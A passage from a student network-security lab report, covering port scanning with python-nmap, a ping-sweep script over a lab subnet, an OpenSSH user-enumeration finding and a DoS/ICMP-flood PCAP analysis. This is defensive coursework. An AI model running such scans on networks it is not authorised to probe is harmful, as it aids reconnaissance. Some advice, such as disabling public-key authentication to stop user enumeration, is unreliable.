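    if scanner[host].state() != "up":
        continue
    open_ports = [port for port in scanner[host].all_tcp()
                  if scanner[host]["tcp"][port]["state"] == "open"]
    print(f"{host}: {len(open_ports)} open TCP ports -> {sorted(open_ports)}")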
3. What is the single most impactful security vulnerability, in your opinion? Recommend a good mitigation strategy to address any vulnerabilities identified.
Having port 22 open for OpenSSH for Windows 7.7 is concerning, because that version is prone to a user enumeration vulnerability. By exploiting it, a valid username can be ascertained through a form of brute-force attempt; once a valid username is found, the bad actor can simply brute force the password (Pankov, 2020). If not in use, disabling public-key authentication is a good mitigation step. It is also a good idea to scan the system regularly for signs of this taking place; OpenVAS can perform such scans and will provide recommended steps.
4. What can you say about the results when scanning multiple hosts and/or a subnet compared with the individual host scans?
Figure 9. Single Host Scan    Figure 10. Multiple Host Scan
Figure 11. Ping Single Host    Figure 12. Subnet Ping
The results from individual host scans versus multiple host scans differ in topology, as shown in Figures 9 and 10 above. Latency is fairly similar between them. The scan of the Kali Linux subnet shows that 4 of 1,000 ports are open (Figure 12 above), while the Windows VM has 12 open ports (Figure 11).
5. Recommend a good mitigation strategy to address any vulnerabilities identified.
I like both Nessus and OpenVAS. For our Windows machines, Nessus will work fine as an off-the-shelf, ready-to-go tool. For our SAP/Linux machines, which are highly customized, I would choose OpenVAS because we can tailor it to fit our needs. These two tools, together with frequent scans, are a good strategy for finding and addressing our vulnerabilities.
6. In your opinion, why are some hosts reported as down? Do you recognize any security concerns? [Hint: use the ping utility to see if any IP within the range is reachable from the Windows machine].
I believe some hosts are reporting as down due to a lack of subnetting, which is concerning. The network topology and IP scheme can be set up to separate and isolate subnets for business reasons, e.g., separating the Human Resources, Accounting, and Production departments. This is also ideal for isolating and mitigating attacks so that they don’t spread across the entire system (Menon, 2022). You can also set rules to limit traffic between subnets.
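A simple ping sweep like the one hinted at in the question can be scripted as shown below; the address range is the lab subnet and should be treated as an assumption for your own network.

# Sketch: a simple ping sweep of part of the lab subnet to see which hosts
# answer. The address range is an assumption; adjust it for your own network.
import platform
import subprocess

SUBNET = "192.168.10."           # assumed lab address range
count_flag = "-n" if platform.system() == "Windows" else "-c"

for last_octet in range(100, 115):
    ip = f"{SUBNET}{last_octet}"
    result = subprocess.run(["ping", count_flag, "1", ip],
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    status = "up" if result.returncode == 0 else "down/unreachable"
    print(f"{ip:15} {status}")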
NOTE: Proceed to the next page and use the space provided to compile a summary of your lab experience report. Use additional space as necessary to complete the report.
SUMMARY OF YOUR LAB EXPERIENCE REPORT
Use the space below to summarize your lab experience report based on your findings from the lab, making sure to complete all required actions in each step of the lab and respond to all questions. Be sure to incorporate the key parts of your findings into your final project report for submission to your professor. You may use additional space as necessary to complete the lab.
During this lab, we utilized packets captured in the form of a PCAP file to analyze the network traffic on the day of the attack. It is clear after analyzing the traffic that two IP addresses (192.168.10.101 and 192.168.10.111) had a very large volume of traffic between them. IP address 192.168.10.101 was the obvious source of the traffic, and the recipient was 192.168.10.111, with over 1.9 million packets sent between them. This is a clear-cut case of a DoS attack rather than a DDoS attack, which would involve multiple source machines; here we have only the one source. We know that both machines are on the same network and subnet. The data also revealed a flood of ICMP requests due to the DoS attack. Being on the same network means that either a user’s credentials or machine were compromised, or this could be an insider attack. Nmap was used to scan network machines, revealing only one open host and indicating a lack of subnetting to separate departments within the network. We also discovered that OpenSSH port 22 is open, leaving the network vulnerable to user enumeration.
References
Ferguson, K. (2021). Denial-of-service attack. TechTarget. https://www.techtarget.com/searchsecurity/definition/denial-of-service#:~:text=A%20denial%2Dof%2Dservice%20(,information%20technology%20(IT)%20resources.
Fidele, K. A., Suryono, & Sayafei. (2020). Denial of Service (DoS) attack identification and analyse using sniffing technique in the network environment. E3S Web of Conferences, 202(15003). https://doi.org/10.1051/e3sconf/202020215003
Firch, J. (2021). How to prevent an ICMP flood attack. PurpleSec. https://purplesec.us/prevent-pingattacks/
Grimmick, R. (2021). Packet capture: What is it and what you need to know. Varonis. https://www.varonis.com/blog/packet-capture
Menon, K. (2022). Best guide to understand the importance of what is subnetting. Simplilearn. https://www.simplilearn.com/tutorials/cyber-security-tutorial/what-is-sub-netting
Pankov, N. (2020). Enumeration attack dangers. Kaspersky. https://www.kaspersky.com/blog/usernameenumeration-attack/34618/